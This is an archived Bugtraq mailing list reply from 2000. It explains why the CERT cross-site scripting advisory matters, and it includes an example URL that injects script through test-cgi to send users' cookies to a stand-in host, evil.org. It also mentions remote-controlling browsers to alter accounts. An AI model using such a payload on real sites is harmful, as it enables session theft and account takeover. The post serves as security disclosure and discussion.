Bugtraq mailing list archives
Re: Fwd: CERT Advisory CA-2000-02
From: metal_hurlant () YAHOO COM (Henri Torgemane)
Date: Thu, 3 Feb 2000 14:22:38 -0800
First, what the CERT describes isn't one of the many implementation bugs we've seen before, like bugs crashing the browser or giving access to local resources: This is a design problem. One obvious abuse could be to compromise online accounts: Many sites use cookies to avoid asking for a username/password on every page of their site. As a result, cookies are often equivalent to passwords. Interestingly, javascript can access cookies on the domain from which the script has been loaded. Say, if your site uses cookies as a mean of authentication and has test-cgi installed, you can get your user's cookies grabbed with a URL like: <A HREF="http://yoursite.com/cgi-bin/test-cgi?a=<script">http://yoursite.com/cgi-bin/test-cgi?a=<script</A>>(new Image).src="http://evil.org/?"+escape(document.cookie)</script> Each time a user of your site happens to follow that URL, the log of the evil.org web server will contain the cookies for his account. In other cases, rather than actually taking the cookie, one can instead choose to "remote-control" the browser, making it take actions to modify the user account or grab some personal information (e-mail messages on a webmail system, for example) without the user having a chance to see what's going on. Hope it helps, Henri Torgemane Shockro () aol com wrote:
I'm curious as to how this could be used in a malicious manner, as opposed to just being an annoyance. I mean, god forbid, people should execute arbitrary javascript on us. Yes, we've all seen the file upload form exploit and the 1001 ways to crash Internet Explorer through infinite loops, but there's nothing seriously harmful about this, am I right? Please correct me if I'm wrong. Shockro Support DeCSS Support Reverse Engineering
Current thread:
- Re: Bypass Virus Checking, (continued)
- Re: Bypass Virus Checking Brock Sides (Feb 01)
- Re: Bypass Virus Checking salme () US IBM COM (Feb 01)
- Fwd: CERT Advisory CA-2000-02 Shockro () AOL COM (Feb 02)
- Re: Fwd: CERT Advisory CA-2000-02 fury (Feb 03)
- Re: Fwd: CERT Advisory CA-2000-02 Ari Gordon-Schlosberg (Feb 03)
- Re: Fwd: CERT Advisory CA-2000-02 Marc Slemko (Feb 03)
- Re: Fwd: CERT Advisory CA-2000-02 Henrik Nordstrom (Feb 05)
- Re: Fwd: CERT Advisory CA-2000-02 Byron Alley (Feb 07)
- Re: Fwd: CERT Advisory CA-2000-02 Len Budney (Feb 08)
- Novell GroupWise 5.5 Enhancement Pack Web Access Denial of Servic e Adam Gray (Feb 07)
- Fwd: CERT Advisory CA-2000-02 Shockro () AOL COM (Feb 02)
- Re: Fwd: CERT Advisory CA-2000-02 Henri Torgemane (Feb 03)
- recent 'cross site scripting' CERT advisory Tim Hollebeek (Feb 04)
- Re: recent 'cross site scripting' CERT advisory Marc Slemko (Feb 05)
- Re: recent 'cross site scripting' CERT advisory Manuel Martin (Feb 08)
- Novell BorderManager 3.5 Remote Slow Death Chicken Man (Feb 08)
- Re: Novell BorderManager 3.5 Remote Slow Death Ron van Daal (Feb 09)
- Re: Novell BorderManager 3.5 Remote Slow Death Puchatek (Feb 11)
- Re: recent 'cross site scripting' CERT advisory Bill Thompson (Feb 06)
- Re: recent 'cross site scripting' CERT advisory Ari Gordon-Schlosberg (Feb 07)
- Re: recent 'cross site scripting' CERT advisory Taneli Huuskonen (Feb 07)
- Re: recent 'cross site scripting' CERT advisory Peter W (Feb 08)